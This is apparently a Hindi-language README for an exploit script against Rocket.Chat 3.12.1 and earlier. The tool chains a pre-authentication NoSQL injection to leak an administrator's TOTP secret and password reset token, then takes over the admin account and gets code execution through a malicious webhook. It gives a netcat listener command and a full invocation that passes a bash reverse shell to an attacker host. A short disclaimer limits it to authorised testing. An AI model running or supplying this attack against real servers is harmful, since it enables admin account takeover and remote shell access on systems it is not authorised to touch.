
Rocket.Chat 3.12.1 के लिए शोषण: प्री-ऑथ NoSQL इंजेक्शन के माध्यम से RCE, एडमिन TOTP सीक्रेट और पासवर्ड रीसेट टोकन लीक करके दुर्भावनापूर्ण वेबहुक इंटीग्रेशन के जरिए रिमोट कोड एक्जीक्यूशन प्राप्त करना।
Rocket.Chat 3.12.1 में एक प्री-ऑथ NoSQL इंजेक्शन भेद्यता का शोषण करता है ताकि व्यवस्थापक के TOTP गुप्त और पासवर्ड रीसेट टोकन को लीक किया जा सके, व्यवस्थापक खाते पर कब्जा किया जा सके, और एक दुर्भावनापूर्ण वेबहुक एकीकरण के माध्यम से RCE प्राप्त किया जा सके।
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
एक्सप्लॉइट चलाने से पहले, एक अलग टर्मिनल में netcat लिसनर शुरू करें आने वाले रिवर्स शेल को पकड़ने के लिए:
nc -lvnp 4444
इस टर्मिनल को खुला रखें। एक बार एक्सप्लॉइट सफलतापूर्वक चलने पर, आपका शेल यहाँ दिखाई देगा।
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत प्रवेश परीक्षण के लिए है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। परीक्षण से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें।
| फ्लैग | विवरण |
|---|
-t | लक्ष्य Rocket.Chat URL |
-u | आपका पंजीकृत निम्न-विशेषाधिकार उपयोगकर्ता नाम |
-p | आपका पंजीकृत निम्न-विशेषाधिकार पासवर्ड |
-e | व्यवस्थापक ईमेल पता |
-a | व्यवस्थापक उपयोगकर्ता नाम |
-c | रिवर्स शेल कमांड |
-v | वर्बोज़ मोड (कच्चे प्रतिक्रियाएँ दिखाता है) |